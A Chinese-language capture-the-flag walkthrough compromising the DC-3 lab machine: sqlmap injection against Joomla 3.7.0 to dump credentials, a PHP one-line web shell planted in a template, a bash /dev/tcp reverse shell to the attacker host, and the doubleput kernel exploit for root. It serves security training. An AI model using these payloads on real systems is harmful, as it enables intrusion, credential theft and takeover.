DC-3主机渗透

提示:仅供学习参考,勿盗用,谢谢


前言

本文章主要讲解DC-3主机渗透全过程


提示:以下是本篇文章正文内容,可供参考

一、配置

DC-3主机渗透

网络适配器打开VMnet8;

在VMware中文件 -- 打开 -- 导入DC-3;

开启kali、DC-3.

kali作为攻击机 ip地址:192.168.159.128

DC-3 ip:192.168.159.133

注:确保靶机和攻击机在同一网段,设置同一网络连接方式:kali、DC-3虚拟机设置-网络适配器使用NAT模式;DC-3虚拟机设置DC/DVD(IDE)-高级-IDE(D)修改为IDE 0:0。如下图:

二、步骤

1.发现目标主机ip:

代码如下:

arp-scan -l

 

2.收集目标主机端口信息:

代码如下:

nmap -sV -p- 192.168.159.133

 3.访问目标主机80端口

4.收集目标主机的web信息

whatweb http://192.168.159.133

 

发现Joomla框架(CMS)

5.利用joomscan进行Joomla框架扫描

joomscan是Joomla框架的专属扫描工具

joomscan --url http://192.168.159.133

发现 Joomla 版本是3.7.0 
发现后台管理页面 http://192.168.159.133/administrator/ 

(后台管理页面也可以用dirb http://192.168.159扫描)

6.搜索寻找Joomla版本是否有漏洞

searchsploit joomla 3.7.0

7.选择sql注入攻击脚本

8.查看SQL注入漏洞对应的文件42033.txt

cat php/webapps/42033.txt 不成功

find / -name 42033.txt

 

cat usr/share/exploitdb/exploits/php/webapps/42033.txt

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

9.根据42033.txt提示进行sqlmap注入或手工注入

 查询数据库:

sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] 

 查询表名:

sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

 查询列:

sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" --columns -p list[fullordering]

注出数据:

sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" -C username,password --dump -p list[fullordering]

 注出结果:

10.破解密文

 将密文编辑到txt文件,使用john工具破解密文:

 解出口令为snoopy

 11.登录网站后台,写入一句话木马

 找到Templates -- Beez3 -- New File -- 创建PHP文件 -- 写入一句话木马 --save

 

 

 一句话木马代码:

<?php
@eval($_POST[1]);
?>

12.蚁剑连接

 连接成功后,右键打开虚拟终端,反弹shell

在kali打开终端输入命令:nc -lnvp 4444
蚁剑虚拟终端输入命令:bash -c 'sh -i &>/dev/tcp/192.168.159.128/4444 0>&1'

13.收集主机内核版本信息和操作系统版本信息

uname -a
cat /etc/issue

14.搜索提权漏洞

searchsploit Ubuntu 16.04

 在这里选择39772.txt文件

15.找到39772.txt漏洞脚本

find / -name 39772.txt
cat /usr/share/exploitdb/exploits/linux/local/39772.txt

16.下载39772.zip漏洞执行压缩包

此链接国内无法访问,懂得都懂

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

17.上传漏洞提权包至靶机

考虑蚁剑上传39772.zip:

18.解压39772.zip

如图所示命令操作:

19.解压exploit.tar

20.执行脚本文件

./compile.sh
./doubleput

 21.成功获得root权限,进入root目录查看

cd /root
ls
cat the-flag.txt

 成功查看flag文件,渗透完成!


总结

以上就是今天要讲的内容,本文详细介绍了DC-3渗透主机的使用。

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值